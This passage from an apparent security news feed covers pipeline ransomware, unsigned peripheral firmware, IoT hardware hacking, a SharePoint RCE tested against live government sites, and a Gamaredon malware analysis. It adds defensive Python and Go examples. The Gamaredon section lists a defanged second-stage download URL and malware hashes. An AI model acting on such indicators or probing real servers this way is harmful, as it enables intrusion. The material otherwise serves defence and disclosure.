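ZONES = {
    "IT":  [ipaddress.ip_network("10.10.0.0/16")],      # corporate workstations, mail, file servers
    "DMZ": [ipaddress.ip_network("10.20.0.0/24")],      # jump host and historian replica
    "OT":  [ipaddress.ip_network("192.168.50.0/24")],   # HMIs, historians, polling servers
}

# Allowed cross-zone flows as (src zone, dst zone, dst port). Everything else is denied,
# so a spearphished IT workstation has no direct path to an HMI.
POLICY = {
    ("IT", "DMZ", 3389),    # analysts RDP to the jump host only
    ("DMZ", "OT", 3389),    # the jump host carries the session onward into OT
    ("OT", "DMZ", 443),     # the historian replicates outward to the DMZ replica
    ("IT", "DMZ", 443),     # IT reads the replica, never the OT historian itself
}

# The weak setting: the same policy with IT-to-OT SMB and RDP opened "for convenience".
FLAT_POLICY = POLICY | {("IT", "OT", 445), ("IT", "OT", 3389)}

def zone_of(ip):
    """Map an address to its zone; anything outside the known ranges is 'EXT'."""
    addr = ipaddress.ip_address(ip)
    for name, nets in ZONES.items():
        if any(addr in net for net in nets):
            return name
    return "EXT"

def check_flows(flows, policy=POLICY):
    """Return the flows that cross a zone boundary without a matching policy entry."""
    violations = []
    for src, dst, port in flows:
        src_zone, dst_zone = zone_of(src), zone_of(dst)
        if src_zone == dst_zone or (src_zone, dst_zone, port) in policy:
            continue
        violations.append({"src": src, "dst": dst, "port": port, "path": f"{src_zone}->{dst_zone}"})
    return violations

# Constructed flow records (src, dst, dst port), as exported from a firewall or NetFlow collector.
SAMPLE_FLOWS = [
    ("10.10.5.23", "10.20.0.10", 3389),     # analyst RDPs to the jump host: fine
    ("10.20.0.10", "192.168.50.15", 3389),  # jump host onward to an HMI: fine
    ("10.10.5.23", "192.168.50.15", 445),   # IT workstation straight to an HMI over SMB: the pivot
    ("10.10.5.23", "192.168.50.15", 3389),  # same workstation RDPing directly into OT
    ("192.168.50.20", "10.20.0.11", 443),   # historian replicating outward: fine
    ("192.168.50.15", "10.10.5.23", 445),   # HMI reaching back into IT: ransomware spreading
    ("10.10.5.23", "10.10.5.40", 445),      # IT to IT: out of scope for this check
]

if __name__ == "__main__":
    for v in check_flows(SAMPLE_FLOWS):
        print(f"{v['path']:8} {v['src']} -> {v['dst']}:{v['port']}")
    print("flat policy misses:", len(check_flows(SAMPLE_FLOWS)) - len(check_flows(SAMPLE_FLOWS, FLAT_POLICY)))
```

Run against a day of flow exports, the IT->OT lines are the paths a phished workstation could take; the OT->IT line is the route a commodity ransomware worm takes back out, which the strict policy also catches.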

“The victim was able to obtain replacement equipment and load last-known-good configurations to facilitate the recovery process.” continues the report. “All OT assets directly impacted by the attack were limited to a single geographic facility.”

Having replacement equipment on hand and last-known-good configurations to load made the recovery considerably easier.

CISA officials confirmed that the threat actor never obtained the ability to control or manipulate operations during the attack.

Although the direct impact of the attack on operations was limited to one control facility, geographically distinct compression facilities also had to halt operations because of pipeline transmission dependencies. The cyberattack resulted in an operational shutdown of the entire pipeline asset for approximately two days.

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post US CISA warns of Ransomware attacks impacting pipeline operations appeared first on Security Affairs.

Unsigned Firmware running on peripherals could expose Windows, Linux systems to hack

Peripheral devices with unsigned firmware can expose Windows and Linux machines to hack, warn experts from firmware security firm Eclypsium.

Experts at firmware security firm Eclypsium have discovered that many peripheral device manufacturers have not implemented security checks to prevent the installation of firmware from an untrusted source.

An attacker could exploit the missing checks to run malicious firmware on the peripheral and then act against both Windows and Linux hosts, for example by installing persistent backdoors.

“The problem is that peripheral devices often lack the same security best practices that we take for granted in operating systems and in other more visible components, like the UEFI or BIOS.” reads the post published by Eclypsium.

“Many peripheral devices do not verify that firmware is properly signed with a high quality public/private key before running the code. This means that these components have no way to validate that the firmware loaded by the device is authentic and should be trusted. An attacker could simply insert a malicious or vulnerable firmware image, which the component would blindly trust and run.”

Experts highlighted that attackers could tamper with the firmware of devices such as network cards, drives, and other peripherals, to remotely control them or to sabotage them.

This kind of attack is not theoretical: the NSA-linked APT group Equation Group used these techniques to compromise the firmware of hard drives.

The researchers analyzed the flaws in four types of peripheral firmware for touchpads/trackpads, cameras, WiFi adapters, and USB hubs.

Peripheral devices do not implement mechanisms to validate that the firmware they load is authentic, so an attacker could simply insert a malicious or vulnerable firmware image, which the component would run.

Attackers can plant malicious firmware on a network adapter to intercept or alter traffic, or on PCI devices to carry out DMA attacks.

Eclypsium found security issues in the touchpad and TrackPoint firmware used in Lenovo laptops, in the HP Wide Vision FHD (Sunplus) camera on HP laptops, in the WiFi adapter installed on a Dell XPS laptop, and in a VLI USB hub.

The experts also published a video PoC of an attack on a network interface with a Broadcom chipset that runs unsigned firmware.

“A malicious attack on a NIC can have a profound impact on the server, compromising the operating system remotely, providing a remote backdoor, snooping and exfiltrating raw network traffic and bypassing operating system firewalls to extract data or deliver ransomware.” reads the analysis published by the experts. “Such an attack could disconnect a server from a network upon a signal, disrupting connectivity for an entire data center.”

The attack chain demonstrated by the experts starts with the attackers delivering a piece of malware to the targeted machine via email, a malicious website or an evil maid attack. The malware acts as the vector used to load the tainted firmware onto a peripheral device that is unable to validate its origin and authenticity.

Experts pointed out that the difficulty of carrying out the attack depends on the specific device. For some devices the firmware can be updated by unprivileged users, as in the case of the Sunplus webcam firmware.

The experts pointed out that on Linux and Windows a mechanism to verify the firmware signature before an update still has to be implemented, while Apple devices mitigate the issue by verifying the signature of the files in a driver package, including the firmware, every time it is loaded on a device.
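To make the missing check concrete, here is an added Go model of a peripheral update path (it is not Eclypsium’s code and does not reproduce any vendor’s real image format; the image layout, the Device type and the function names are assumptions made for this example). BuildImage is the vendor-side signing step, VerifyImage and CheckedUpdate are the device-side Ed25519 check the report says many components lack, and BlindUpdate is the “trust whatever the host sends” behaviour the report describes. A tampered image and an image signed with someone else’s key are both rejected by the checked path and silently accepted by the blind one.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
)

// Hypothetical image layout, an assumption for this example and not any vendor's format:
//   magic (6 bytes) | payload length (4 bytes, little-endian) | payload | Ed25519 signature (64 bytes)
// The signature covers everything before it, so the header cannot be altered either.
const imageMagic = "FWIMG1"

var (
	ErrBadMagic     = errors.New("firmware: bad magic")
	ErrTruncated    = errors.New("firmware: truncated or malformed image")
	ErrBadSignature = errors.New("firmware: signature verification failed")
)

// BuildImage is the vendor-side step: package the payload and sign it with a
// private key that never leaves the vendor's build system.
func BuildImage(priv ed25519.PrivateKey, payload []byte) []byte {
	var buf bytes.Buffer
	buf.WriteString(imageMagic)
	binary.Write(&buf, binary.LittleEndian, uint32(len(payload)))
	buf.Write(payload)
	buf.Write(ed25519.Sign(priv, buf.Bytes()))
	return buf.Bytes()
}

// VerifyImage is the device-side check the report says many peripherals lack:
// parse the header, then hand back the payload only if the signature validates
// under the public key provisioned in the device.
func VerifyImage(pub ed25519.PublicKey, img []byte) ([]byte, error) {
	hdr := len(imageMagic) + 4
	if len(img) < hdr+ed25519.SignatureSize {
		return nil, ErrTruncated
	}
	if string(img[:len(imageMagic)]) != imageMagic {
		return nil, ErrBadMagic
	}
	// 64-bit arithmetic so a hostile length field cannot wrap the bounds check.
	n := uint64(binary.LittleEndian.Uint32(img[len(imageMagic):hdr]))
	if n+uint64(hdr)+ed25519.SignatureSize != uint64(len(img)) {
		return nil, ErrTruncated
	}
	end := hdr + int(n)
	if !ed25519.Verify(pub, img[:end], img[end:]) {
		return nil, ErrBadSignature
	}
	return img[hdr:end], nil
}

// Device models a peripheral holding the vendor public key and its current firmware.
type Device struct {
	VendorPub ed25519.PublicKey
	Firmware  []byte
}

// BlindUpdate mirrors the behaviour the report describes: whatever the host
// hands over is written to the part, no questions asked.
func (d *Device) BlindUpdate(img []byte) {
	d.Firmware = img
}

// CheckedUpdate refuses any image that does not carry a valid vendor signature.
func (d *Device) CheckedUpdate(img []byte) error {
	payload, err := VerifyImage(d.VendorPub, img)
	if err != nil {
		return err
	}
	d.Firmware = payload
	return nil
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	dev := &Device{VendorPub: pub}

	good := BuildImage(priv, []byte("genuine firmware v1.2"))
	fmt.Println("genuine image:", dev.CheckedUpdate(good))

	tampered := append([]byte(nil), good...)
	tampered[len(imageMagic)+4] ^= 0xff // flip one payload byte
	fmt.Println("tampered image:", dev.CheckedUpdate(tampered))

	_, otherPriv, _ := ed25519.GenerateKey(rand.Reader)
	fmt.Println("image signed with another key:", dev.CheckedUpdate(BuildImage(otherPriv, []byte("not ours"))))
}
```

The point of the model is where the trust root sits: the device carries only the vendor public key, so a host that has been compromised by malware can still only deliver images the vendor actually signed. Real products also need the key to be immutable (fused or in ROM) and an anti-rollback counter, neither of which this sketch covers.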

“The issue of unsigned firmware in peripheral devices is a widespread problem affecting a broad spectrum of brands and their ODM suppliers.” concludes the report. “Unsigned firmware in peripheral devices remains a highly overlooked aspect of cybersecurity. Depending on the capabilities of the component, unsigned firmware can lead to the loss of data, integrity, and privacy, and can allow attackers to gain privileges and hide from traditional security controls. Given the widespread nature of unsigned firmware, enterprises should scan their devices for any vulnerable components, and should assess the firmware posture of new devices during procurement.”

Pierluigi Paganini

(SecurityAffairs – unsigned firmware, hacking)

The post Unsigned Firmware running on peripherals could expose Windows, Linux systems to hack appeared first on Security Affairs.

Hacking IoT devices with Focaccia-Board: A Multipurpose Breakout Board to hack hardware in a clean and easy way!

Go grab a copy of the Gerbers and 3D-printed Case STL files at https://github.com/whid-injector/Focaccia-Board and print through your favorite FAB.

Prologue

Even before the appearance of the term (I)IoT, I was breaking hardware devices, as many of you were, with a multitude of debuggers (i.e. stlink, jlink, RS232-to-USB, etc.). It was always a PITA carrying around one device that does UART-to-USB, another that supports JTAG or SWD, an SPI reader/dumper, and so on.

Luckily for all of us, FTDI released the lovely FT232H chipset, which supports all of them in one single chip. Hurray!

One of the cheapest boards embedding the FT232H on the market is the FT232H CJMCU, which costs less than 10 EUR!

Focaccia Board
FT232 CJMCU (Easily available on ebay, amazon or Aliexpress)

Still, there were a couple of drawbacks:

  • Every time, I had to remember which pin was doing what, for each of the protocols (i.e. UART, JTAG, SWD, I2C, SPI).
  • There were no pull-up resistors on the PCB.
  • Some pins used for one protocol have to be short-circuited to operate with other protocols (i.e. I2C or SWD).
  • Too many flying cables when you need to connect some testing DuPont wires (example below).
Focaccia Board
DIY breadboard to keep flying cables more in order.

During last Xmas holidays I thought: “That’s enough, I am done. I need a proper breakout that will save my time”. And that’s how Focaccia-Board came to life!

Focaccia Board
Assembled Focaccia-Board

Main Features:

  • Easy to access Pins for all supported protocols: UART, SPI, I2C, JTAG, SWD.
  • Voltage Selector to easily switch from 3.3V to 5V.
  • Support for SOP8/SOP16 Clips (in order to dump SPI Flashes without desoldering them from the target device)
  • Support for SOP8/SOP16 sockets adapters.
  • A multi-purpose breadboard-like set of pin headers/sockets and terminal blocks to help you deal with flying cables (i.e. the lower part of the PCB). Note: this part is not wired to the FT232H at all; how you use it is up to you.

Some Practical Use-Cases

Focaccia-Board Vs Fingbox (UART):

Last year you may remember me disclosing this lovely bug in FingBox (a super-duper IoT security appliance that is supposed to protect your LAN-connected devices from attackers):

In this first use-case, I used Focaccia-Board (from now on a.k.a. F-B) to debug the UART console, which was easily accessible on the FingBox’s PCB.

Focaccia Board

As shown below, the U-Boot output was easily available and led to enough insights to discover the way to get root.

Focaccia Board

Focaccia-Board Vs WinkHub (JTAG):

The next use-case shows how to easily connect to the target device over JTAG in order to live-debug it or even dump the entire flash memory.

Focaccia Board
Focaccia-Board connected to the WinkHub’s JTAG.

Once the correct JTAG pinout (i.e. TDI, TDO, TMS, TCK, etc.) and the correct OpenOCD config files for both F-B* and the target device have been identified, we can run it with the command:

sudo openocd -f ft232h_jtag-swd.config -f target_device.cfg

*The right config file for F-B is in its Github repo.

Focaccia Board
Focaccia-Board’s JTAG successfully attached to WinkHub.

Focaccia-Board Vs WHID Injector (SPI Dump):

This time you will see how easy it is to use F-B to conduct some forensics on a weaponized mouse containing my beloved WHID-Injector.

Focaccia Board
Weaponized Mouse with WHID-Injector and USB HUB.

Once I had obtained the suspicious mouse and confirmed it was weaponized, I proceeded to identify the SPI flash and remove it from the PCB.

Focaccia Board

The next step was to use the SOP8 socket on the Focaccia-Board to dump the SPI flash content.

Focaccia Board

In order to dump the Flash content you have to fire the following command: 

flashrom -p ft2232_spi:type=232H -r spi_dump.bin

(Reminder: for a forensic acquisition it is always recommended to acquire the flash content with the WP (Write Protect) pin disabled (see the jumper on the PCB), so that we are 100% sure the content of the flash will not be modified during the operation, and therefore that it is forensically acceptable as evidence.)

Of course we can also use a SOP8 Clip to dump it.

Focaccia Board

And here are the results of the dump and some initial forensic analysis of it. As you can see, there are plenty of artifacts left over by the attacker.

Focaccia Board
SPI dump and Forensics Analysis of it.

In some cases it is also possible to dump an SPI flash directly from the PCB of the target device (though this is discouraged, unless you manage to keep the target’s CPU in a reset state and thus unable to talk to the SPI flash itself).

Focaccia Board
Example of SPI dump with SOP16 clip directly from the target’s PCB.
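As an added example (not part of the original post or of the Focaccia-Board repository), the Go program below performs the first triage a forensic examiner does on a flashrom dump like the one above: it checks that two consecutive reads of the part are identical (the complement to the WP reminder above; a mismatch means a flaky clip contact or a CPU still talking to the flash), records the SHA-256 of the evidence file, extracts printable strings with their offsets, and maps the image into erased, code/data and packed-or-encrypted regions by byte entropy. The flash image it analyses is constructed inline (an erased 0xFF block, a block of config-like text, a pseudo-random block); the entropy thresholds, block size and function names are assumptions for the example.

```go
package main

import (
	"bytes"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"math"
)

// AcquisitionMatches compares two consecutive reads of the same part. If they
// differ, the dump is not trustworthy and must be re-acquired before analysis.
func AcquisitionMatches(first, second []byte) bool {
	return bytes.Equal(first, second)
}

// Digest is the SHA-256 hex digest recorded alongside the evidence file.
func Digest(img []byte) string {
	sum := sha256.Sum256(img)
	return hex.EncodeToString(sum[:])
}

// Found is one printable-ASCII run and its offset in the image.
type Found struct {
	Offset int
	Text   string
}

// StringsIn is a strings(1)-style pass: runs of printable ASCII at least minLen long.
func StringsIn(img []byte, minLen int) []Found {
	var out []Found
	start := -1
	flush := func(end int) {
		if start >= 0 && end-start >= minLen {
			out = append(out, Found{Offset: start, Text: string(img[start:end])})
		}
		start = -1
	}
	for i, b := range img {
		printable := b >= 0x20 && b <= 0x7e
		switch {
		case printable && start < 0:
			start = i
		case !printable && start >= 0:
			flush(i)
		}
	}
	flush(len(img)) // a run that reaches the end of the image
	return out
}

// Entropy is Shannon entropy in bits per byte: 0 for erased or constant
// regions, close to 8 for compressed or encrypted data.
func Entropy(block []byte) float64 {
	if len(block) == 0 {
		return 0
	}
	var counts [256]int
	for _, b := range block {
		counts[b]++
	}
	n, h := float64(len(block)), 0.0
	for _, c := range counts {
		if c > 0 {
			p := float64(c) / n
			h -= p * math.Log2(p)
		}
	}
	return h
}

// Region classifies one fixed-size block of the image. The thresholds are assumptions.
type Region struct {
	Offset  int
	Entropy float64
	Kind    string // "erased", "code/data" or "packed/encrypted"
}

func MapRegions(img []byte, blockSize int) []Region {
	var regions []Region
	for off := 0; off < len(img); off += blockSize {
		end := off + blockSize
		if end > len(img) {
			end = len(img)
		}
		e := Entropy(img[off:end])
		kind := "code/data"
		switch {
		case e < 0.1:
			kind = "erased"
		case e > 7.0:
			kind = "packed/encrypted"
		}
		regions = append(regions, Region{Offset: off, Entropy: e, Kind: kind})
	}
	return regions
}

// ConstructedImage is a fabricated stand-in for a real SPI dump: a 1 KiB erased
// block, 1 KiB holding config-like plaintext, and 1 KiB of pseudo-random bytes
// derived from SHA-256 to mimic packed data. The strings in it are made up.
func ConstructedImage() []byte {
	img := bytes.Repeat([]byte{0xff}, 1024)
	text := make([]byte, 1024)
	copy(text, "wifi_ssid=LAB-AP\x00wifi_psk=hunter2\x00update_url=http://example.invalid/fw.bin\x00")
	img = append(img, text...)
	for i := 0; i < 32; i++ {
		sum := sha256.Sum256([]byte{byte(i)})
		img = append(img, sum[:]...)
	}
	return img
}

func main() {
	img := ConstructedImage()
	again := ConstructedImage() // stands in for a second physical read of the part
	fmt.Println("reads match:", AcquisitionMatches(img, again), "sha256:", Digest(img))
	for _, s := range StringsIn(img, 8) {
		fmt.Printf("0x%06x %s\n", s.Offset, s.Text)
	}
	for _, r := range MapRegions(img, 1024) {
		fmt.Printf("0x%06x entropy=%.2f %s\n", r.Offset, r.Entropy, r.Kind)
	}
}
```

On a real acquisition, run flashrom twice into two files, feed both to AcquisitionMatches, and write the digest into the case notes before any further tooling touches the image; the region map then tells you which parts of the dump are worth a closer look and which ones will need unpacking or decryption first.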

Focaccia-Board Vs Smartlock (Multi-purpose Breadboard):

Finally, an example of how to use the lower part of F-B’s set of pin headers/sockets and terminal blocks against a smartlock in a forensic investigation scenario.

Focaccia Board
Smartlock connected to its debugger through the F-B’s breadboard

In this case, the FT232H is not involved. I just used the lower part of F-B’s PCB to connect those ugly flying cables, which were non-standard DuPont wires.

Focaccia Board
Successfully dumped the smartlock’s firmware.

And after having successfully dumped the firmware we can proceed to extract some valuable evidence for the forensic case.

Focaccia Board
Artifacts extracted from the FW analysis: Smartlock Passwords & User’s Logs.

Overall

Focaccia-Board is nothing extraordinary. But it saves my time while hacking (I)IoT targets. And that’s enough to be considered a valuable asset in my lab. 🙂 Hope you will enjoy it too!

P.S. I am going to ask the WHID-Injector & WHID-Elite manufacturer whether they are interested in bringing it to life at the usual affordable price, for the folks out there that have no time or capabilities to print the PCB themselves.

#StayTuned & Follow @whid-injector on Twitter!

Focaccia Board

The original post is available in Medium:

https://medium.com/@LucaBongiorni/hacking-iot-devices-with-focaccia-board-8c4e009ed488

About the author: Luca Bongiorni

Luca works as a Principal Offensive Security Engineer and in his spare time is involved in InfoSec, where his main fields of research are Radio Networks, Hardware Reverse Engineering, Hardware Hacking, Internet of Things and Physical Security. He also loves to share his knowledge and present some cool projects at security conferences around the globe. At the moment he is focusing his research on bypassing biometric access control systems, ICS security and air-gapped environments.

Pierluigi Paganini

(SecurityAffairs – hacking IoT, Focaccia board)

The post Hacking IoT devices with Focaccia-Board: A Multipurpose Breakout Board to hack hardware in a clean and easy way! appeared first on Security Affairs.

CVE-2019-0604 SharePoint Remote code execution (RCE) vulnerability

A security expert found a flaw in SharePoint that could be exploited to remotely execute arbitrary code by sending a specially crafted SharePoint application package.

Summary:
A few days ago I saw a post from AlienVault which says attackers are still exploiting a SharePoint vulnerability to attack Middle East government organizations. Having said that, I found that the Income Tax Department of India and MIT Sloan were also vulnerable to CVE-2019-0604, a remote code execution vulnerability which exists in Microsoft SharePoint. A malicious actor could exploit this vulnerability by simply sending a specially crafted SharePoint application package.

Technical analysis:
I found this vulnerability in my free time while I was browsing ZoomEye to find such components. The application (incometaxindia.gov.in) was found to be vulnerable as it was using SharePoint as the technology to host its service. To verify this I sent a crafted payload which enabled the remote server (incometaxindia.gov.in) to perform a DNS lookup on my Burp Collaborator. You can do this manually by sending the crafted XML payload or via desharialize.

Aside, MIT Sloan School of Management was also found to be vulnerable with CVE-2019-0604.

CVE-2019-0604

Responsible Disclosure:
CERT-In (IncomeTaxIndia)
This was sent to CERT-In on Feb 12, 2020; I got an initial response from them on Feb 13, 2020. After that, the vulnerability was patched silently.
For MIT:
This was sent to the MIT security team on Feb 13, 2020; I got an initial response from them on Feb 14, 2020. After that, the vulnerability was patched silently on Feb 15, 2020.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original post at:

https://www.inputzero.io/2020/02/sharepoint-rce.html

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2019-0604)

The post CVE-2019-0604 SharePoint Remote code execution (RCE) vulnerability appeared first on Security Affairs.

Flaw in WordPress ThemeGrill Demo Importer WordPress theme plugin exposes 200K+ sites to hack

A serious flaw in the ThemeGrill Demo Importer WordPress theme plugin with over 200,000 active installs can be exploited to wipe sites and gain admin access to the site.

Experts from the security firm WebARX have discovered a serious flaw in the WordPress theme plugin ThemeGrill Demo Importer with over 200,000 active installs. The vulnerability could be exploited to wipe sites running the vulnerable versions of the plugin and gain admin access to the site.

ThemeGrill Demo Importer is a popular plugin that allows WordPress website administrators to import demo content, widgets and settings for ThemeGrill theme plugin with just one click.

The critical flaw, that existed for the past three years, affects versions 1.3.4 through 1.6.1 of the plugin and could be exploited only against those websites where the ThemeGrill theme plugin is activated.

Once attackers have exploited the vulnerability, the database is populated with default settings and data. If the database includes a user named “admin,” exploiting the flaw allows the attacker to automatically log in as an administrator.

“The prerequisite is that there must be a theme installed and activated that was published by ThemeGrill.” reads the analysis published by WebARX. “In order to be automatically logged in as an administrator, there must be a user called “admin” in the database. Regardless of this condition, the database will still be wiped to its default state.”

The bad news is that exploitation of the issue affecting the ThemeGrill plugin can be automated.

The development team behind the ThemeGrill addressed the flaw with the release of version 1.6.2.

Below the timeline for the vulnerability:

  • 06-02-2020 – Discovery of the issue and released a patch to all WebARX customers.
  • 06-02-2020 – Reported the issue to the developer of the plugin.
  • 11-02-2020 – Second attempt to reach out to the developer.
  • 14-02-2020 – Received email from developer, resent the issue to them.
  • 16-02-2020 – Developer published a new version which fixes the issue.

Recently, issues in other WordPress plugins also made the headlines:

  • Jan. 2020 – An authentication bypass vulnerability in the InfiniteWP plugin that could potentially impact more than 300,000 sites.
  • Jan. 2020 – Over 200K WordPress sites are exposed to attacks due to a high severity cross-site request forgery (CSRF) bug in Code Snippets plugin.
  • Feb. 2020 – A stored cross-site scripting vulnerability in the GDPR Cookie Consent plugin that could potentially impact 700K users.

Pierluigi Paganini

(SecurityAffairs – hacking, WordPress)

The post Flaw in WordPress ThemeGrill Demo Importer WordPress theme plugin exposes 200K+ sites to hack appeared first on Security Affairs.

FC Barcelona and the International Olympic Committee Twitter accounts hacked

The popular hacker group OurMine has hacked the official Twitter account of the FC Barcelona, along with the accounts of Olympics and the International Olympic Committee (IOC).

On Saturday, the popular hacker collective OurMine hijacked the official Twitter accounts of FC Barcelona, the Olympics and the International Olympic Committee (IOC). This is the second time that FC Barcelona has lost control of its account: in 2017, the Spanish team had both its Facebook and Twitter accounts defaced by the same hacker group.

The hackers hijacked the official Barcelona and Olympic Twitter accounts and posted some tweets to claim responsibility for the hack.

“Hi, we are OurMine,” states the tweet from the Barcelona account. “Wel, we read some private messages and it look like Neymar will back here.”

The hackers also shared an email address where they can be contacted to request support for improving the security of the victims’ accounts.

The incident was confirmed by the Barcelona FC and by the International Olympic Committee.

A Twitter spokesperson confirmed to Business Insider that both the Olympics and FC Barcelona accounts were hacked by a group called OurMine and through a “third-party platform.” 

“As soon as we were made aware of the issue, we locked the compromised accounts and are working closely with our partners to restore them,” a Twitter spokesperson confirmed to Business Insider. 

“The IOC can confirm that it is investigating a potential breach into some of its social accounts,” read a statement from a spokesperson for the International Olympic Committee. 

Business Insider speculates that the hack occurred via a third-party platform.

“In an email to Business Insider, OurMine confirmed it was behind the cyberattacks against both FC Barcelona and the Olympics. The group, which it said consisted of 5 people, told Business Insider it chooses its targets at random.” continues Business Insider. “It confirmed it used a third-party app to access the accounts.”

Immediately after the hack, Twitter locked both accounts.

OurMine is back after a period of silence, earlier this year the group hijacked the official Twitter accounts of 15 NFL teams and the league itself. Last week the group also hacked the Twitter and Instagram accounts for Facebook and Messenger.

To secure your social media accounts, enable two-factor authentication (2FA) wherever the service offers it.

Pierluigi Paganini

(SecurityAffairs – hacking, Barcelona FC)

The post FC Barcelona and the International Olympic Committee Twitter accounts hacked appeared first on Security Affairs.

Russian govt blocked Tutanota service in Russia to stop encrypted communication

Tutanota, the popular free and open-source end-to-end encrypted email software, has been blocked by Russian authorities.

The popular free and open-source end-to-end encrypted email service Tutanota was blocked in Russia on Friday evening. Since early February, the Russian government has blocked other encrypted email and VPN services in Russia, including ProtonMail and ProtonVPN.

Tutanota is listed in the registry of blocked sites provided by Russian activists.

Roskomnadzor explained that the services were abused by cybercriminals and some of the blocked companies refused to register their services with state authorities. The Russian government asks all Internet service providers and VPN providers operating in the country to provide information about their users.

As of March 2017, Tutanota’s owners claimed to have over 2 million users of the product.

The blockage of the Tutanota service has been verified by the OONI Explorer, an open data resource on internet censorship around the world.

Tutanota is disappointed by the block and explained that the Kremlin’s decision is an act against encryption and confidential communication in Russia.

“Tutanota focuses on providing a secure and confidential communication channel to citizens, but also to journalists and activists.” states Tutanota.

“Encrypted communication is a thorn in the side to authoritarian governments like Russia as encryption makes it impossible for security services to eavesdrop on their citizens. The current blocking of Tutanota is an act against encryption and confidential communication in Russia.”

People who need secure communication in Russia and in other countries where the Tutanota service has been blocked, such as Egypt, can still access Tutanota by using the Tor browser or a VPN.

“We condemn the blocking of Tutanota. It is a form of censorship of Russian citizens who are now deprived of yet another secure communication channel online”, says Matthias Pfau, co-founder of Tutanota. “At Tutanota we fight for our users’ right to privacy online, also, and particularly, in authoritarian countries such as Russia and Egypt.”

On Thursday, a court in Moscow fined Twitter and Facebook 4 million rubles (roughly $63,000) each for refusing to store the personal data of Russian citizens on servers that are located in Russia. According to the media, these are the largest penalties imposed by the Kremlin on Western IT firms under internet use laws since 2012.

“The fines of nearly $63,000 are the first five-figure fines levied on tech companies since Russia adopted a flurry of legislation starting in 2012 designed to tighten the government’s grip on online activity.” reported the Associated Press.

Roskomnadzor is attempting to oblige IT giants, including Facebook, Twitter, and Google, to move data related to Russian citizens to servers in Russia, allowing the government to monitor them.

Roskomnadzor pointed out that the fines are only a foretaste of further penalties: both companies would be fined 18 million rubles ($283,000) each if they don’t comply this year.

The Russian government could also ban IT companies that will not comply with the same law.

Pierluigi Paganini

(SecurityAffairs – Tutanota, Russia)

The post Russian govt blocked Tutanota service in Russia to stop encrypted communication appeared first on Security Affairs.

Launching the First “Yomi Hunting” Challenge!

About a year ago, Yoroi released the Yomi Hunter sandbox; today it is challenging the malware community with the first “Yomi Hunting” contest.

About a year ago, we publicly released the Yomi Hunter sandbox for a few simple reasons: in Yoroi we believe in the InfoSec community value, we think it plays a central role in the fight of cyber-threats and we feel the need to support it. 

Our sentiment regarding the InfoSec community led us to support the Italian CTF team in their path to the final round of the European Cyber Security Challenge tournament last year. But, we also love to create things, so we were the first Italian Private Company launching and maintaining a public instance of the sandbox technology we developed across the years. 

It was natural for us to try to give back something to the community we believe in, concretely.

Today is different. 

Today, we’d love to challenge the malware community with the first “Yomi Hunting” contest. Literally, a malware and threat hunting contest with a simple and straightforward goal: hunt the bad guys.

So we are inviting malware analysts, security professionals and community researchers to feed the Yomi boxes with good malware, and to stay in touch with the Yoroi Twitter account to work with us and the other good guys.

Of course, as with every contest, “Yomi Hunting” has some cool prizes too, such as the possibility of publishing a joint malware research with our Z-LAB, along with awards and other fun stuff we will ship to the most active researchers participating in the contest.

Well, how to participate?

It’s quite simple: just go to the Yomi Hunter registration page, create a free community account, submit interesting samples and get in touch with us on our socials to share your findings! Or just include the “#yomihunter” hashtag in your tweets.

How does it work?

The contest will start on 17 February 2020 and will end on 31 March 2020. At the end of the contest the three researchers who have submitted the most samples will be rewarded with:

  1. First prize: backpack, shirt, agenda and gadgets
  2. Second place: shirt, agenda and gadgets
  3. Third place: agenda and gadgets

Every participant can monitor the chart through the Yomi Hunter “Wall of Fame” here.

Happy Hunting!

Pierluigi Paganini

(SecurityAffairs – hacking, Yomi)

The post Launching the First “Yomi Hunting” Challenge! appeared first on Security Affairs.

Cyberwarfare: A deep dive into the latest Gamaredon Espionage Campaign

Security experts from Cybaze-Yoroi ZLab have conducted a detailed analysis of an implant used by the Gamaredon APT group in a recent campaign.

Introduction 

Gamaredon Group is a persistent cyber espionage operation attributed to the Russian FSB (Federal Security Service), part of a long-term military and geopolitical confrontation with the Ukrainian government and, more generally, with the Ukrainian military.

Gamaredon has been active since 2014, and during this time its modus operandi has remained almost the same. The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintain access on compromised machines. It is distributed in spear-phishing campaigns with a weaponized Office document that appears designed to lure military personnel.

In recent months, Ukrainian CERT (CERT-UA) reported an intensification of Gamaredon Cyberattacks against military targets. The new wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez. Starting from those findings, Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant.

Technical Analysis

The complex infection chain begins with a weaponized Office document named “f.doc”. In the following table the initial malware information is provided.

Hash: 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a
Threat: Gamaredon Pteranodon weaponized document
Brief Description: Doc file weaponized with Exploit
Ssdeep: 768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir:uG1aKQ5OwCrItq3TgGfLt9r

Table 1. Information about initial dropper

The decoy document is written in Ukrainian mixed with many special characters, aimed at luring the target into clicking on it; once opened, it appears as in the following figure.

Figure 1. Overview of the document

The document leverages the well-known CVE-2017-0199 exploit and tries to download a second stage from “hxxp://win-apu.]ddns.]net/apu.]dot”.

Figure 2. URL used by document to download the second stage

Thanks to this remote code execution exploit, no user interaction is required; in fact the “enable macro” button is not shown. The downloaded document has a “.dot” extension, which Microsoft Office uses for templates shared by documents with similar formats. Basic information on the “.dot” file:

Hash: e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8
Threat: Gamaredon Pteranodon loader dot file
Brief Description: Dot file enabling the infection of the Gamaredon Pteranodon
Ssdeep: 768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ:oI8XoWruHpp/P4

Table 2. Information about second stage

If we open the document, we see that it is empty, but it asks for macros to be enabled.

Figure 3. Overview of the second stage document

The body of the macro can be logically divided into two distinct parts: 

